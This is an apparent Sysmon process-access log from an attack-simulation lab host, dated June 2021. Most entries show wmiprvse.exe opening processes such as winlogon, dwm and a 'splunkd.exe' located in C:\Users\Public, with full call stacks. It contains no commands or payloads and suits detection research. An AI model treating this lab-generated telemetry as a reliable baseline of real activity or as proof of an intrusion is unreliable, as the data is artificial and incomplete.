21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150773Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150772Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150771Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150770Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150769Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150768Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150767Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150766Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150765Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150764Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150763Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150762Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150761Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150760Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150759Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.380{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150758Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 